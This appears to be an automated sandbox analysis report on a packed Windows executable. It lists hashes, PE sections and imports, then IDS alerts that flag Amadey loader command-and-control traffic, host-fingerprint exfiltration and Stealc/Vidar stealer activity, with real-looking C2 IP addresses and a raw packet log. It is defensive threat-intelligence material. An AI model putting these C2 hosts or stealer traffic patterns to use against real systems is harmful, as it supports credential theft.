MD5:	44ae545ca405437b73165b8247a83569
SHA1:	632951c3548897f801d0c0fc3256cf788b7fb285
SHA256:	885e1d96bfbf210d1170054fddd7ec31c4c95ca6951a7be4f8ae3c07d1b9e6de
SHA512:	cf216df9221da261d216582af60775fc6aef420b0e85440e0a260fc740b25219885a5962f9ec4279e3fa211e9ed44124650cc2cb689418c9a483f840a9e0e117
SSDEEP:	49152:1t/Y3TzVeVNpx0tkmxfd++pXahCsqQrt+oi3qmL:1tckEFXNRahC3at+Tr
TLSH:	3195336916BBC479FE9783BC23EBFC6279FE0560060D6BCB145E250B4E8424972ED607
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>................

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x8c1000
Entrypoint Section:	.taggant
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x66A240BE [Thu Jul 25 12:10:38 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	2eabe9054cad5152567f0699947a2c5b

Entrypoint Preview

Instruction
jmp 00007FE2E926F89Ah
hint_nop dword ptr [00000000h]
add cl, ch
add byte ptr [eax], ah
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x6a057	0x6b	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x69000	0x1e0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x4bf428	0x10	iulrnrzg
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x4bf3d8	0x18	iulrnrzg
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
	0x1000	0x68000	0x2de00	873af5afc4ddf18d1ac6bf8c6ba59673	False	0.9974614696866485	data	7.984965162992603	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x69000	0x1e0	0x200	e1208534d2e5b943a31d9518b5023746	False	0.576171875	data	4.535685479715561	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x6a000	0x1000	0x200	cc76e3822efdc911f469a3e3cc9ce9fe	False	0.1484375	data	1.0428145631430756	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
	0x6b000	0x2b2000	0x200	a4f43bcbf55f103f2eedc66c83940890	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
iulrnrzg	0x31d000	0x1a3000	0x1a2600	626e5a802104b9efb05fa11f165df368	False	0.9947329231401255	data	7.95339645397811	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
cqwupthl	0x4c0000	0x1000	0x400	df6df0ed156e554121457adaeebbee3d	False	0.8173828125	data	6.348891275447338	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant	0x4c1000	0x3000	0x2200	cd21408561079f2008ddf7d648f71392	False	0.006433823529411764	DOS executable (COM)	0.019571456231530684	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_MANIFEST	0x4bf438	0x17d	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.5931758530183727

Imports

DLL	Import
kernel32.dll	lstrcpy

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	Protocol	SID	Signature	Severity	Source Port	Dest Port	Source IP	Dest IP
2024-08-19T06:05:59.896500+0200	TCP	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	49853	443	192.168.2.4	195.201.118.191
2024-08-19T06:06:01.321045+0200	TCP	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	49856	443	192.168.2.4	195.201.118.191
2024-08-19T06:06:51.190982+0200	TCP	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	49946	443	192.168.2.4	195.201.118.191
2024-08-19T06:06:46.936625+0200	TCP	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	49937	443	192.168.2.4	195.201.118.191
2024-08-19T06:06:45.925681+0200	TCP	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	49934	443	192.168.2.4	195.201.118.191
2024-08-19T06:06:10.134516+0200	TCP	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	49875	443	192.168.2.4	195.201.118.191
2024-08-19T06:06:49.013750+0200	TCP	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	49941	443	192.168.2.4	195.201.118.191
2024-08-19T06:05:54.637145+0200	TCP	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	49842	443	192.168.2.4	195.201.118.191
2024-08-19T06:04:03.013346+0200	TCP	2856147	ETPRO MALWARE Amadey CnC Activity M3	1	49737	80	192.168.2.4	185.215.113.16
2024-08-19T06:06:55.640385+0200	TCP	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	49954	443	192.168.2.4	195.201.118.191
2024-08-19T06:06:24.545934+0200	TCP	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	49899	443	192.168.2.4	195.201.118.191
2024-08-19T06:06:37.747838+0200	TCP	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	49916	443	192.168.2.4	195.201.118.191
2024-08-19T06:06:54.281222+0200	TCP	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	49952	443	192.168.2.4	195.201.118.191
2024-08-19T06:05:55.777587+0200	TCP	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	49844	443	192.168.2.4	195.201.118.191
2024-08-19T06:04:06.174070+0200	TCP	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	49738	80	192.168.2.4	185.215.113.16
2024-08-19T06:06:14.014025+0200	TCP	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	49881	443	192.168.2.4	195.201.118.191
2024-08-19T06:06:06.708283+0200	TCP	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	49867	443	192.168.2.4	195.201.118.191
2024-08-19T06:06:23.266633+0200	TCP	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	49896	443	192.168.2.4	195.201.118.191
2024-08-19T06:06:25.890970+0200	TCP	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	49901	443	192.168.2.4	195.201.118.191
2024-08-19T06:06:47.975383+0200	TCP	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	49939	443	192.168.2.4	195.201.118.191
2024-08-19T06:06:19.279581+0200	TCP	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	49890	443	192.168.2.4	195.201.118.191
2024-08-19T06:06:40.740456+0200	TCP	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	49922	443	192.168.2.4	195.201.118.191
2024-08-19T06:05:57.904139+0200	TCP	2049087	ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST	1	49848	443	192.168.2.4	195.201.118.191
2024-08-19T06:04:03.522338+0200	TCP	2019714	ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile	2	49737	80	192.168.2.4	185.215.113.16
2024-08-19T06:06:17.621680+0200	TCP	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	49887	443	192.168.2.4	195.201.118.191
2024-08-19T06:06:15.861102+0200	TCP	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	49884	443	192.168.2.4	195.201.118.191
2024-08-19T06:05:59.218980+0200	TCP	2044247	ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config	1	443	49850	195.201.118.191	192.168.2.4
2024-08-19T06:06:42.926693+0200	TCP	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	49927	443	192.168.2.4	195.201.118.191
2024-08-19T06:06:52.261132+0200	TCP	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	49948	443	192.168.2.4	195.201.118.191
2024-08-19T06:06:38.742162+0200	TCP	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	49918	443	192.168.2.4	195.201.118.191
2024-08-19T06:06:05.418564+0200	TCP	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	49865	443	192.168.2.4	195.201.118.191
2024-08-19T06:06:08.808642+0200	TCP	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	49872	443	192.168.2.4	195.201.118.191
2024-08-19T06:06:44.920583+0200	TCP	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	49932	443	192.168.2.4	195.201.118.191
2024-08-19T06:06:07.724657+0200	TCP	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	49870	443	192.168.2.4	195.201.118.191
2024-08-19T06:06:50.106924+0200	TCP	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	49943	443	192.168.2.4	195.201.118.191
2024-08-19T06:06:43.934074+0200	TCP	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	49929	443	192.168.2.4	195.201.118.191
2024-08-19T06:05:58.572052+0200	TCP	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	49850	443	192.168.2.4	195.201.118.191
2024-08-19T06:06:12.100518+0200	TCP	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	49878	443	192.168.2.4	195.201.118.191
2024-08-19T06:06:39.806322+0200	TCP	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	49920	443	192.168.2.4	195.201.118.191
2024-08-19T06:06:00.557854+0200	TCP	2051831	ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1	1	443	49853	195.201.118.191	192.168.2.4
2024-08-19T06:04:08.200394+0200	TCP	2856147	ETPRO MALWARE Amadey CnC Activity M3	1	49740	80	192.168.2.4	185.215.113.16
2024-08-19T06:04:03.276538+0200	TCP	2856122	ETPRO MALWARE Amadey CnC Response M1	1	80	49737	185.215.113.16	192.168.2.4
2024-08-19T06:06:02.323246+0200	TCP	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	49859	443	192.168.2.4	195.201.118.191
2024-08-19T06:05:57.225681+0200	TCP	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	49848	443	192.168.2.4	195.201.118.191
2024-08-19T06:06:41.777490+0200	TCP	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	49925	443	192.168.2.4	195.201.118.191

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 19, 2024 06:04:02.252701044 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:02.257574081 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:02.257692099 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:02.267920971 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:02.272711992 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:03.013286114 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:03.013345957 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:03.016980886 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:03.021789074 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:03.269598961 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:03.269809961 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:03.271759987 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:03.276537895 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:03.522007942 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:03.522030115 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:03.522047043 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:03.522140026 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:03.522169113 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:03.522183895 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:03.522334099 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:03.522337914 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:03.522337914 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:03.522350073 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:03.522368908 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:03.522403002 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:03.522403002 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:03.522447109 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:03.522567034 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:03.522583008 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:03.522598028 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:03.522634029 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:03.522680044 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:03.527306080 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:03.527326107 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:03.527343035 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:03.527396917 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:03.527466059 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:03.857016087 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:03.857065916 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:03.857080936 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:03.857104063 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:03.857117891 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:03.857132912 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:03.857155085 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:03.857172012 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:03.857181072 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:03.857181072 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:03.857186079 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:03.857202053 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:03.857213974 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:03.857228041 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:03.857243061 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:03.857247114 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:03.857247114 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:03.857256889 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:03.857271910 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:03.857287884 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:03.857295036 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:03.857301950 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:03.857316017 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:03.857331038 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:03.857345104 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:03.857371092 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:03.857376099 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:03.857408047 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:03.857419014 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:03.857419014 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:03.857423067 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:03.857436895 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:03.857450962 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:03.857465029 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:03.857490063 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:03.857490063 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:03.857534885 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:03.857764959 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:03.857780933 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:03.857821941 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:03.857870102 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:03.863960028 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:03.864020109 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:03.864046097 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:03.864111900 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:03.864144087 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:03.864160061 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:03.864175081 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:03.864200115 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:03.864248037 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:03.864248991 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:03.864264011 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:03.864279985 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:03.864309072 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:03.864336014 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:03.865113020 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:03.865185976 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:03.865211964 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:03.865226030 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:03.865235090 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:03.865247965 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:03.865267992 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:03.865305901 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:03.865305901 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:03.866202116 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:03.866216898 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:03.866234064 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:03.866256952 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:03.866286993 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:03.866293907 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:03.866303921 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:03.866317987 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:03.866354942 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:03.866354942 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:03.867111921 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:03.867146015 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:03.867161036 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:03.867171049 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:03.867177010 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:03.867192030 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:03.867192984 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:03.867204905 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:03.867208958 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:03.867238998 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:03.867238998 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:03.868132114 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:03.868146896 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:03.868160963 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:03.868175030 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:03.868191004 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:03.868196011 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:03.868206024 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:03.868208885 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:03.868256092 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:03.868256092 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:03.869052887 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:03.869067907 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:03.869096041 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:03.869111061 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:03.869122982 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:03.869122982 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:03.869127035 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:03.869143009 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:03.869160891 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:03.869160891 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:03.869177103 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:03.870038986 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:03.870054960 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:03.870079041 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:03.870090961 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:03.870094061 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:03.870110035 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:03.870125055 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:03.870146036 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:03.870146036 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:03.870172977 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:03.970710993 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:03.970738888 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:03.970784903 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:03.970812082 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:03.970839024 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:03.970854998 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:03.970870972 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:03.970938921 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:03.971179008 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:03.971205950 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:03.971220016 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:03.971230030 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:03.971267939 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:03.971267939 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:03.971544027 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:03.971590996 CEST	80	49737	185.215.113.16	192.168.2.4
